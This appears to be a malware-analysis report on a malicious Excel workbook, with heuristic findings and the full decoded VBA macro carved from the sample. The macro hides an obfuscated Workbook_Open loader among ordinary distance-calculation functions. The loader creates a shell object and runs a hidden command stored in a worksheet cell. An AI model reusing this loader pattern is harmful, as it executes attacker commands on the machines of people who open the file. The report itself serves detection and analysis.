Malicious Office (OLE) / .XLS — malware analysis report

Static analysis result for SHA-256 aefe0add7986c245…

MALICIOUS

Office (OLE) / .XLS

Size: 66.0 KB
Created: 2019-02-11 19:07:25
Authoring application: Microsoft Excel
First seen: 2026-06-22
MD5: 9e4c12343c116993d6ecf9530d2c5dd6
SHA-1: 82ca29932f9bcf2f62ad32d6129dfa1f63f8a856
SHA-256: aefe0add7986c2455e6c35d5c935936d724b2734de9ac1644948315bea7b401e
Risk Score: 330

Heuristics (10)

  • Office EPRINT stream contains EMF object [high, CVE related] (OLE_EPRINT_EMF_OBJECT)
    OLE ObjectPool contains an EPRINT stream with EMF data. This is rare in normal documents and is treated as Office object-delivery evidence when paired with exploit-payload anomalies, but the malformed graphics record required for exact CVE attribution is not proven by this rule alone.
  • ClamAV: Xls.Malware.Valyria-9756472-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Xls.Malware.Valyria-9756472-0
  • VBA macros detected [medium, 5 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code.
  • Obfuscated auto-exec VBA loader [critical] (OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER)
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script:
        Set objHTTP = CreateObject("MSXML2.ServerXMLHTTP")
  • CreateObject call [high] (OLE_VBA_CREATEOBJ)
    CreateObject call
    Matched line in script:
        Set objHTTP = CreateObject("MSXML2.ServerXMLHTTP")
  • Payload URL assembled from a Chr()/Asc() string expression (1 URL) [high] (OLE_VBA_EXPR_DROPPER_URL)
    A VBA macro builds its stage-2 download URL character by character from string literals concatenated with Chr()/Asc()/StrReverse() results — often nested (Chr(Asc(Chr(Asc("h")))) = "h") and split across the + and & operators, sometimes written out via Print #n into a second-stage VBScript/PowerShell file. The URL is assembled at run time and never appears contiguously on disk, and there is no numeric array to brute-force, so a literal scan and the array recoverers both miss it. A bounded expression evaluator resolved it; it is surfaced as an IOC. Self-validating: only a valid host URL that is not already present verbatim in the macro is reported, so a benign macro cannot false-positive.
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Workbook_Open macro [low] (OLE_VBA_WBOPEN)
    Workbook_Open macro
    Matched line in script:
        Sub Workbook_Open()
  • Excel 4.0 (XLM) macro sheet present [medium] (OLE_XLM_AUTOOPEN)
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://maps.googleapis.com/maps/api/distancematrix/json?origins=&destinations=&mode=car&language=en&sensor=false&key=YOUR_KEY (referenced by macro)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: xlm_macros.txt
Kind: xlm-macro
Source: oletools.olevba.extract_all_macros (XLM macro listing)
Size: 229 bytes
SHA-256: ac3fe6720250bf67d6d766cbfeb5a3936d2b9ab2973d09a5f12b2b83bd7cb12f
Preview (first 1,000 lines of the extracted script):
' 0085     13 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  LNNE
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 9989 bytes
SHA-256: 788f44f84bf7989b65d8a478eb1683053d1bbdc30104423e3802c8b3aa6797fb
Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Public w5ec393ebb As Object
Public Function GetDuration(start As String, dest As String)
    Dim firstVal As String, secondVal As String, lastVal As String
    firstVal = "http://maps.googleapis.com/maps/api/distancematrix/json?origins="
    secondVal = "&destinations="
    lastVal = "&mode=car&language=en&sensor=false&key=YOUR_KEY"
    Set objHTTP = CreateObject("MSXML2.ServerXMLHTTP")
    URL = firstVal & Replace(start, " ", "+") & secondVal & Replace(dest, " ", "+") & lastVal
    objHTTP.Open "GET", URL, False
    objHTTP.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
    objHTTP.send ("")
    If InStr(objHTTP.responseText, """duration"" : {") = 0 Then GoTo ErrorHandl
    Set regex = CreateObject("VBScript.RegExp"): regex.Pattern = "duration(?:.|\n)*?""value"".*?([0-9]+)": regex.Global = False
    Set matches = regex.Execute(objHTTP.responseText)
    tmpVal = Replace(matches(0).SubMatches(0), ".", Application.International(xlListSeparator))
    GetDuration = CDbl(tmpVal)
    Exit Function
ErrorHandl:
    GetDuration = -1
End Function
Public Function GetDistanceCoord(ByVal lat1 As Double, ByVal lon1 As Double, ByVal lat2 As Double, ByVal lon2 As Double, ByVal unit As String) As Double
    Dim theta As Double: theta = lon1 - lon2
    Dim dist As Double: dist = Math.Sin(deg2rad(lat1)) * Math.Sin(deg2rad(lat2)) + Math.Cos(deg2rad(lat1)) * Math.Cos(deg2rad(lat2)) * Math.Cos(deg2rad(theta))
    dist = WorksheetFunction.Acos(dist)
    dist = rad2deg(dist)
    dist = dist * 60 * 1.1515
    If unit = "K" Then
        dist = dist * 1.609344
    ElseIf unit = "N" Then
        dist = dist * 0.8684
    End If
    GetDistanceCoord = dist
End Function
 
Function deg2rad(ByVal deg As Double) As Double
    deg2rad = (deg * WorksheetFunction.Pi / 180#)
End Function
 
Function rad2deg(ByVal rad As Double) As Double
    rad2deg = rad / WorksheetFunction.Pi * 180#
End Function
Sub Workbook_Open()
Set w5ec393ebb = CreateObject(x86e1e32188("716D7D8C838A8E486D827F8686"))
Dim fc964add29bc94 As Long: fc964add29bc94 = 5
Dim me15459e5 As String
Dim ze81e7d1de787a7 As Long
Select Case fc964add29bc94
Case 24 - (15 + 13) - 4 * Int(83 / 64 + 14) - Int(1607 / 3771) * 12
me15459e5 = "r2ab932f4824a2"
Case 16 + (216 - 336) + Int(20 + 4 - 13) + 6 / Int(23 + 4 / 4) / 27
me15459e5 = "ze836f7dc756e4c"
Case 13 - (10 + 27) - 21 / Int(11 + 28 / 15) / 23 / Int(21 + 10 / 16) / 9
me15459e5 = "n7981e382"
Case 27 + (336 - 348) + Int(12 + 23 - 6) + 5 / Int(19 + 11 / 22) / 10 * Int(98 / 69 + 13) - Int(3651 / 4454) * 20
me15459e5 = "y7fe4162948"
Case 19 / Int(10 + 16 / 17) / 24 + (252 - 324) + Int(19 + 14 - 11) + 18 - (23 + 23) - 7
me15459e5 = "neae7d"
Case 6 + (228 - 204) + Int(21 + 14 - 12) + 8 - (14 + 14) - 5 / Int(18 + 4 / 4) / 17
me15459e5 = "gc62fb7a3f45ab"
Case 13 - (22 + 4) - 17 / Int(27 + 18 / 21) / 6
me15459e5 = "q977dda7424865"
Case 8 / Int(7 + 21 / 26) / 17 + (348 - 312) + Int(17 + 29 - 16) + 8 + (156 - 168) + Int(5 + 9 - 6) + 11
me15459e5 = "z1e4445"
Case 26 + (324 - 324) + Int(22 + 11 - 26) + 21 * Int(12 / 91 + 17) - Int(1072 / 3265) * 10 - (25 + 16) - 17
me15459e5 = "jc6fcb"
Case 8 - (22 + 7) - 5 * Int(25 / 63 + 18) - Int(4898 / 1927) * 8
me15459e5 = "h71b1a29aa7fc96"
Case 18 - (26 + 18) - 21 * Int(25 / 65 + 19) - Int(1063 / 27) * 29
me15459e5 = "ff6ddf"
Case 29 * Int(52 / 56 + 15) - Int(3591 / 3756) * 18 / Int(14 + 29 / 10) / 9
me15459e5 = "kfb4751885"
Case 29 / Int(9 + 5 / 10) / 16 / Int(17 + 20 / 7) / 26 + (144 - 192) + Int(29 + 28 - 15) + 23
me15459e5 = "j615e651e47e"
Case 28 - (17 + 25) - 26 / Int(11 + 26 / 19) / 4 - (7 + 28) - 7
me15459e5 = "pd95af8b2"
Case 19 + (204 - 252) + Int(14 + 20 - 6) + 17 - (20 + 26) - 5
me15459e5 = "m5e15e"
Case 18 * Int(67 / 51 + 11) - Int(2917 / 2103) * 10 * Int(54 / 97 + 12) - Int(380 / 4880) * 8
me15459e5 = "r846fa6"
Case 28 + (240 - 84) + Int(9 + 23 - 4) + 22 + (264 - 336) + Int(15 + 16 - 19) + 8
me15459e5 = "l936b6"
Case 4 - (23 + 10) - 13 + (84 - 96) + Int(8 + 16 - 16) + 15 - (4 + 13) - 6
me15459e5 = "p3d355"
Case 18 / Int(13 + 5 / 19) / 21 - (23 + 27) - 15 - (28 + 16) - 7
me15459e5 = "z7dbe199fa"
Case 13 * Int(87 / 68 + 14) - Int(3610 / 1682) * 8 - (9 + 5) - 24
me15459e5 = "d1956adde91f"
Case 9 - (8 + 24) - 6 * Int(46 / 48 + 9) - Int(4746 / 85) * 25 / Int(15 + 26 / 10) / 13
me15459e5 = "j4146db48e"
Case 12 - (11 + 16) - 29 * Int(85 / 74 + 12) - Int(4746 / 4271) * 26 * Int(51 / 46 + 19) - Int(4901 / 2723) * 11
me15459e5 = "l3e5f1b4341f4"
Case 10 + (228 - 288) + Int(9 + 17 - 25) + 18 - (18 + 26) - 16 + (240 - 312) + Int(15 + 14 - 19) + 5
me15459e5 = "lcf218a28449e"
Case 7 - (4 + 13) - 28 + (156 - 216) + Int(4 + 7 - 23) + 14 * Int(18 / 67 + 13) - Int(4062 / 3480) * 8
me15459e5 = "f826c28"
Case 20 - (19 + 26) - 5 + (120 - 108) + Int(15 + 6 - 25) + 17
me15459e5 = "f2777775ae7d9"
Case 4 + (132 - 180) + Int(16 + 13 - 10) + 6 - (5 + 21) - 11
me15459e5 = "bb21fe44afb82"
Case 24 - (16 + 19) - 10 - (14 + 25) - 27 / Int(21 + 24 / 19) / 6
me15459e5 = "r4cb23"
Case 12 * Int(57 / 38 + 14) - Int(475 / 3084) * 5 + (204 - 336) + Int(24 + 17 - 11) + 15
me15459e5 = "k43ad5d4ecbebd"
Case 4 + (324 - 324) + Int(19 + 19 - 25) + 11 + (264 - 348) + Int(27 + 17 - 6) + 28
me15459e5 = "l5c44c12"
Case 10 * Int(77 / 37 + 14) - Int(1436 / 1850) * 28 - (14 + 12) - 15
me15459e5 = "ufc41c55f5729fc"
Case 4 + (264 - 324) + Int(17 + 22 - 25) + 7 + (84 - 228) + Int(14 + 21 - 18) + 6 / Int(4 + 17 / 4) / 29
me15459e5 = "pa5ca4ff5"
Case 11 + (300 - 348) + Int(21 + 10 - 25) + 9 / Int(26 + 16 / 28) / 23
me15459e5 = "j989d1b7b7"
Case 20 - (8 + 22) - 18 / Int(12 + 23 / 19) / 7
me15459e5 = "ncc2f81f8efa"
Case 11 + (240 - 312) + Int(20 + 29 - 7) + 13 - (14 + 26) - 25 * Int(69 / 38 + 17) - Int(4168 / 2340) * 27
me15459e5 = "ab5e5f96"
Case 19 / Int(28 + 21 / 28) / 21 / Int(18 + 19 / 8) / 14
me15459e5 = "x55711"
Case 19 - (22 + 22) - 26 * Int(33 / 44 + 17) - Int(365 / 2858) * 12
me15459e5 = "kbeeb6735"
Case 13 * Int(9 / 82 + 15) - Int(282 / 2904) * 14 * Int(47 / 53 + 11) - Int(2619 / 1030) * 13
me15459e5 = "s9a6ab986b57c"
Case 7 + (108 - 228) + Int(12 + 15 - 22) + 22 / Int(9 + 14 / 20) / 28
me15459e5 = "u55b2632993cb5"
Case 24 + (348 - 240) + Int(4 + 12 - 18) + 11 - (5 + 21) - 18 - (8 + 10) - 22
me15459e5 = "wec4a4a6ba"
Case 5:
y674b9d236cba3 ("we43fa6cdf35b12")
Case 21 / Int(12 + 18 / 17) / 28 / Int(13 + 4 / 8) / 13
me15459e5 = "p85f53931fa5a"
Case 9 / Int(26 + 20 / 11) / 16 * Int(11 / 54 + 10) - Int(4712 / 1356) * 13
me15459e5 = "xd9ad7"
Case 23 * Int(85 / 34 + 12) - Int(2207 / 4776) * 20 + (336 - 48) + Int(17 + 8 - 21) + 8 / Int(24 + 11 / 29) / 23
me15459e5 = "a9e72cbb"
Case 9 + (156 - 348) + Int(28 + 14 - 7) + 28 * Int(46 / 47 + 10) - Int(807 / 2735) * 6 + (168 - 84) + Int(20 + 17 - 8) + 16
me15459e5 = "z3b8a474e9c3e31"
Case 20 / Int(23 + 4 / 14) / 20 + (108 - 180) + Int(21 + 8 - 20) + 25
me15459e5 = "p591a68"
Case 18 / Int(25 + 19 / 12) / 9 * Int(81 / 33 + 15) - Int(4034 / 315) * 26
me15459e5 = "e19f2cf8132"
Case 24 + (252 - 228) + Int(29 + 19 - 11) + 8 * Int(37 / 30 + 17) - Int(1609 / 3410) * 14 + (312 - 180) + Int(4 + 6 - 19) + 23
me15459e5 = "mb81ff5d4291"
Case 19 + (96 - 216) + Int(15 + 16 - 25) + 8 - (28 + 11) - 12 - (6 + 18) - 22
me15459e5 = "xf1c57c5"
Case 23 - (15 + 21) - 13 / Int(18 + 19 / 27) / 7
me15459e5 = "x341bb3eb"
Case 4 + (72 - 312) + Int(17 + 28 - 8) + 20 * Int(93 / 68 + 18) - Int(2817 / 5995) * 5
me15459e5 = "u99b72"
Case 19 - (24 + 22) - 26 + (60 - 228) + Int(12 + 17 - 25) + 27
me15459e5 = "ab43a232d796"
Case 16 - (25 + 5) - 6 - (14 + 25) - 23 - (9 + 18) - 18
me15459e5 = "ue655e69d35e"
Case 23 / Int(8 + 12 / 9) / 23 / Int(18 + 12 / 15) / 25
me15459e5 = "kf9ee444"
Case 14 / Int(19 + 9 / 26) / 16 / Int(14 + 27 / 7) / 11 / Int(5 + 24 / 21) / 18
me15459e5 = "eafebb"
End Select
End Sub
Private Function y674b9d236cba3(ByVal v3ec2654d716422 As String) As String
w5ec393ebb.Run x86e1e32188(ThisWorkbook.Sheets("LNNES").Range("G135").Value), 0, True
End Function

Private Function x86e1e32188(ByVal v3ec2654d716422 As String)
Dim u43beba5815 As String: Dim jbad815c3 As Long
For jbad815c3 = 1 To Len(v3ec2654d716422) Step 2
u43beba5815 = u43beba5815 & Chr(Val(Chr(Int(0 + 4 + Int(10 / 8) - 13 + Int(6 / 8) + Int(13 / 5) + Int(9 / 5) + Int(11 / 2) - 10 + 48)) & Chr(Int(0 + Int(9 / 5) + Int(6 / 5) + 8 - 11 + 4 - 6 + 8 - 5 + 5 + 67)) & Right(Left(v3ec2654d716422, jbad815c3 + ((34 + 6 - 20) / 2 - 9)), (43 - 23 - 10 + 5 - 13))) - 26)
Next
x86e1e32188 = u43beba5815
End Function
Public Function GetDistance(start As String, dest As String)
    Dim firstVal As String, secondVal As String, lastVal As String
    firstVal = "http://maps.googleapis.com/maps/api/distancematrix/json?origins="
    secondVal = "&destinations="
    lastVal = "&mode=car&language=pl&sensor=false&key=YOUR_KEY"
    Set objHTTP = CreateObject("MSXML2.ServerXMLHTTP")
    URL = firstVal & Replace(start, " ", "+") & secondVal & Replace(dest, " ", "+") & lastVal
    objHTTP.Open "GET", URL, False
    objHTTP.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
    objHTTP.send ("")
    If InStr(objHTTP.responseText, """distance"" : {") = 0 Then GoTo ErrorHandl
    Set regex = CreateObject("VBScript.RegExp"): regex.Pattern = """value"".*?([0-9]+)": regex.Global = False
    Set matches = regex.Execute(objHTTP.responseText)
    tmpVal = Replace(matches(0).SubMatches(0), ".", Application.International(xlListSeparator))
    GetDistance = CDbl(tmpVal)
    Exit Function
ErrorHandl:
    GetDistance = -1
End Function